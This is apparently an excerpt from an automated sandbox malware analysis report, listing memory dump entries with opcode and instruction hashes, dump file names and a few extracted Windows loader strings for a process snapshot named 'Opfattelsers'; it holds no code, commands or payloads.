                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializeProcess
                                                                            • API String ID: 0-2689506271
                                                                            • Opcode ID: e8b2666229fc315212de9e7ac98287b36660def11659a41c47d7db231b5082b4
                                                                            • Instruction ID: b893b9c98bbfc6fc9f4998a33a9e4ac9c7daa4ad16aff8f73ea5371aab52fc21
                                                                            • Opcode Fuzzy Hash: e8b2666229fc315212de9e7ac98287b36660def11659a41c47d7db231b5082b4
                                                                            • Instruction Fuzzy Hash: 0641047650835AAFD311DE58C988BABB7ECFB84720F408A2EF155CA140E775F548CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: verifier.dll
                                                                            • API String ID: 0-3265496382
                                                                            • Opcode ID: a63f7acaefc8b26ada3d0cceee1bf9d8ef9bc06a9b3a5dd7c4b05775cea3a3c2
                                                                            • Instruction ID: c38722818a2a4da68d7083d5afe55d413507272a8e487bd3ef6fcc44343a381d
                                                                            • Opcode Fuzzy Hash: a63f7acaefc8b26ada3d0cceee1bf9d8ef9bc06a9b3a5dd7c4b05775cea3a3c2
                                                                            • Instruction Fuzzy Hash: E331A375B103129FD7188F68D890B6677E5EBC8750F95803AE54ADF281F672ACC0D7A0
                                                                            Strings
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1F7A0058
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                            • API String ID: 0-996340685
                                                                            • Opcode ID: a59ee4652b19a6da5316697a37bffc065006c1c11cfc3d56a32bf85c56b4030b
                                                                            • Instruction ID: 1ab8aab7b62d9f3eebabd3fe26307f74e9d907fcc7232cd0464e49b485e51d4b
                                                                            • Opcode Fuzzy Hash: a59ee4652b19a6da5316697a37bffc065006c1c11cfc3d56a32bf85c56b4030b
                                                                            • Instruction Fuzzy Hash: 10418E35A1074A9AC725DFB4D440AEBB7F4FF49300F054A2ED6AAC7240E335B655CBA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: L4CwL4Cw
                                                                            • API String ID: 3446177414-1654103815
                                                                            • Opcode ID: 5f4425fa8a987571720776c88931e1d29c788b6151432652128c4f6a7b5d74f3
                                                                            • Instruction ID: 9b93c045b1a61ef84f0b7d022780ebaeff5b2a3254cdc9d13c90b2df2228ca2d
                                                                            • Opcode Fuzzy Hash: 5f4425fa8a987571720776c88931e1d29c788b6151432652128c4f6a7b5d74f3
                                                                            • Instruction Fuzzy Hash: 4121A476A00716AFD3228F68D844B5A7BB5FF897A4F16042DE9569B750EB30EC01CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 12664f38f56bf626c4d7e948a5acb247c864445a2384c06f957c3ba84b9f6dff
                                                                            • Instruction ID: 860f5df320a108bdd956dc9a4ed4fad860b889b8d1e912690781774fe82d8f6b
                                                                            • Opcode Fuzzy Hash: 12664f38f56bf626c4d7e948a5acb247c864445a2384c06f957c3ba84b9f6dff
                                                                            • Instruction Fuzzy Hash: 06228135B006568FCB09CF59C490AAEB7B2FF89724B24856DD855DF346EB30E942CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14bebf3f1098b763ba017d1e2ffd31c5c4a92108bf5199939ff5da9074a1027f
                                                                            • Instruction ID: 6deb6a81d3dcfb129ea2bc2805255517c50483bb2f3f199e0b0d0520e607d769
                                                                            • Opcode Fuzzy Hash: 14bebf3f1098b763ba017d1e2ffd31c5c4a92108bf5199939ff5da9074a1027f
                                                                            • Instruction Fuzzy Hash: DA2271356047528FCB09CF29C490A5AB3E1FF89724B148AADE996CF355E730F846CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: db0f0733beda05a932342d548294f43dd632e19898d42187201a3e1273bbc6f7
                                                                            • Instruction ID: e782ae377733c3b5bcb2e0cb97889f4817a9dea2e7e3d8c771c529c234c04cbd
                                                                            • Opcode Fuzzy Hash: db0f0733beda05a932342d548294f43dd632e19898d42187201a3e1273bbc6f7
                                                                            • Instruction Fuzzy Hash: 03F1B775E00219CFCB15CF69D890AEDB7B1FF48314F1A432AE8559B390E736A952CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08f7590d239f0fe45c0b05c4fc496052479a00eb6e42b52eb2ca83fe1e659939
                                                                            • Instruction ID: f146ddc02f6852a17669731e6a8ba64ba22c4925eabe93ef98ef955ec1ee3b17
                                                                            • Opcode Fuzzy Hash: 08f7590d239f0fe45c0b05c4fc496052479a00eb6e42b52eb2ca83fe1e659939
                                                                            • Instruction Fuzzy Hash: A3E192B5A00246DFCB18CF68C890AAAB7F1FF49314F25816DE855EB395D734E981CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8c8059b1f302935867fc912ccab16274eedb02860d26be6edfcca4f3d5ca9f2f
                                                                            • Instruction ID: 557b81261686a99db97f01abb37a0eb430032298038b32d65ab80803156437e5
                                                                            • Opcode Fuzzy Hash: 8c8059b1f302935867fc912ccab16274eedb02860d26be6edfcca4f3d5ca9f2f
                                                                            • Instruction Fuzzy Hash: 63C1B071E002169BEB18DF58CC50BAEB7B6FF84314F5A8269D815AB380E775E951CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f19e1bb9d9219d756cf826dd9cfe01a785055e222a243cbf42e489b8d35d609f
                                                                            • Instruction ID: a7a85bba261c2b77e28e6c8fc973058dae5aa738bf7d34bf18e62f98ac433f1f
                                                                            • Opcode Fuzzy Hash: f19e1bb9d9219d756cf826dd9cfe01a785055e222a243cbf42e489b8d35d609f
                                                                            • Instruction Fuzzy Hash: 25D101B5A002059FCB45CF68D980BCA7BE9BF49344F0541BAED0ADF256E770E945CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be0620dcd345b0aa60384cd3efc5501366c3dc138770f5108615b172156e9cbb
                                                                            • Instruction ID: 3522a1be8a0feb01c682e081de4810f9e3e0a0008dd09560b9fe78d04d238458
                                                                            • Opcode Fuzzy Hash: be0620dcd345b0aa60384cd3efc5501366c3dc138770f5108615b172156e9cbb
                                                                            • Instruction Fuzzy Hash: F0C136B5900309DFCB55CFA8D840A9EBBF5FF88314F16462AE45AAB350E776A901CF50
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e4c82b88ada27c285dd76ffafe644d23b0696a163598602738c8bd2d555c14b
                                                                            • Instruction ID: 26d5d800df2b23e4e8474f9ab429c661fa9d334d2838472e361b57bf7bc37597
                                                                            • Opcode Fuzzy Hash: 8e4c82b88ada27c285dd76ffafe644d23b0696a163598602738c8bd2d555c14b
                                                                            • Instruction Fuzzy Hash: C9917FB1D0026D9BCB15CF64C881BD9B7B4BF09315F0881E9E988AB251E674EE91CFD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                            • Instruction ID: 2e9d109ad95ada926ddb8afe0f5b2e4683e22197815b99c48bcd791883fe8af7
                                                                            • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                            • Instruction Fuzzy Hash: D2817B75A00746AFCB15CF68C584B9ABBF5FF48310F10866AE956DB291D730E981CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f968210bca7adb60c17f2081133f90ea237a2d52df5f94bdf2408f16e7227591
                                                                            • Instruction ID: b9598619be079c742692abe9bce1e0bc38369f524c9f3d47166a9b30174eeac7
                                                                            • Opcode Fuzzy Hash: f968210bca7adb60c17f2081133f90ea237a2d52df5f94bdf2408f16e7227591
                                                                            • Instruction Fuzzy Hash: CF61A675B012199BDF09CE68C980BEE77BAAF84734F114269E8139F2D4EB34E941C790
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f5604a5a9071395345909347db61d4b226cd6daff41af6e93644aae34a906e1
                                                                            • Instruction ID: fd9cebe969e32d6799953353c48b3639d5504d8608416bd6cfafa4f4eb541a2f
                                                                            • Opcode Fuzzy Hash: 4f5604a5a9071395345909347db61d4b226cd6daff41af6e93644aae34a906e1
                                                                            • Instruction Fuzzy Hash: E8715375A00209EFDB01DF94C980FAEB7B9EF48354F254569E514AB250DB31EE01CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 643b246fbc27cfd5caff990afe1bb125586548c3544133d1d752a6ae4043fe28
                                                                            • Instruction ID: b6daa4da9eb7b8201944b4e60e7478f8f420f4000c41a8f74cd6f9d9b91869b0
                                                                            • Opcode Fuzzy Hash: 643b246fbc27cfd5caff990afe1bb125586548c3544133d1d752a6ae4043fe28
                                                                            • Instruction Fuzzy Hash: 63610531A0020AABDB15CEA8C854BEE77B5EFC4758F004569E851EF2E0E774E94187B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 159ad6a8cca1249ba8ff9e36d5795593d8a2e72185484b6df90f3bce6eb146b4
                                                                            • Instruction ID: 3c1c5734a4a1ae7551bfaa98eb2d73c43d76b88adbd953255c1fe815b8d7e28a
                                                                            • Opcode Fuzzy Hash: 159ad6a8cca1249ba8ff9e36d5795593d8a2e72185484b6df90f3bce6eb146b4
                                                                            • Instruction Fuzzy Hash: 41715C75A10629EBCB15DFA8D884BEEBBB5FF4A714F214015E841EF260D731E841DBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eca8fa01f50447f201119103cd2250f0a5e9de5871e47e2a274ae2f9faff2511
                                                                            • Instruction ID: 40f582662dbf3eb7bfe6accc76800c260d6d41580acac5dc7f33a3ea8f144fcb
                                                                            • Opcode Fuzzy Hash: eca8fa01f50447f201119103cd2250f0a5e9de5871e47e2a274ae2f9faff2511
                                                                            • Instruction Fuzzy Hash: AA51B679A0021ADBCB08CF54C481AAE77B1FF44311F1A426AD807AB545FB72F955CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a593bcf60414041bc91bd5a59bd541d7da96c11532ca5c76bc518e063fd35d02
                                                                            • Instruction ID: fd5afbc565406c711918ecbdc097280e593c35d9f35c8a37239c0e882263de68
                                                                            • Opcode Fuzzy Hash: a593bcf60414041bc91bd5a59bd541d7da96c11532ca5c76bc518e063fd35d02
                                                                            • Instruction Fuzzy Hash: 87517D712083069FCB48DF2CD840B5BB7E5EBD8314F25892EF895DB250E730E8158B52
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69bb39e096ed395673df2a16401acd7cf69a279fb0ef764b87f42d74c2272dfe
                                                                            • Instruction ID: 575bfd73d345454e9da53ac5010e37a186fb82a9130721e6c585ea3dfaa93639
                                                                            • Opcode Fuzzy Hash: 69bb39e096ed395673df2a16401acd7cf69a279fb0ef764b87f42d74c2272dfe
                                                                            • Instruction Fuzzy Hash: 536196B5E1571AEFDB05CF68C580B8DBBB1BF48724F01826AE819AB351D734A900CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                            • Instruction ID: 826b0733700a7e7e65a367a069c17b424df63d5d8a1146083faac1bb23bb7542
                                                                            • Opcode Fuzzy Hash: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                            • Instruction Fuzzy Hash: AA511839500A4A97CF08CF79C890AFAB3B9BF41745B10825EE8558F221F734E986CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ecef6dcc503b577aa1eabdc2f8fe620c0ce035dbf5e736e001a784c737cb4360
                                                                            • Instruction ID: b8982afb23d84cc20fcec9aa727383a4fe5acb134588065d6f32ce1e2d49a25e
                                                                            • Opcode Fuzzy Hash: ecef6dcc503b577aa1eabdc2f8fe620c0ce035dbf5e736e001a784c737cb4360
                                                                            • Instruction Fuzzy Hash: 6F51A975504382EFC3219F28D844B6AFBE8FF80724F144A2DE4A58B291E775F845CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                            • Instruction ID: 1a13ce4c7eb06d6c2b202a2b3c9227a1896ed0dce07d6695d1824af06c0c52ec
                                                                            • Opcode Fuzzy Hash: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                            • Instruction Fuzzy Hash: 34511C76A00619DFCB04CF58C880A9ABBF5FF49714B25829AE819DB361D335ED52CBD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cfba7d9441920b262ac71520ff521c47ecc7d34e810acf74868a27b9c48985d9
                                                                            • Instruction ID: 138f4f81a099ea295ac45a935ce55713f63ceedea0770def0658c51873748182
                                                                            • Opcode Fuzzy Hash: cfba7d9441920b262ac71520ff521c47ecc7d34e810acf74868a27b9c48985d9
                                                                            • Instruction Fuzzy Hash: D751B175A01256CFCB08CFA8D490A8EBBF1BF48310F258659D555AB340DB32B951CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
                                                                            • Instruction ID: 9172ef098a7c8cdf54c805daf383700c70118138832d09749015f02385a4a445
                                                                            • Opcode Fuzzy Hash: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
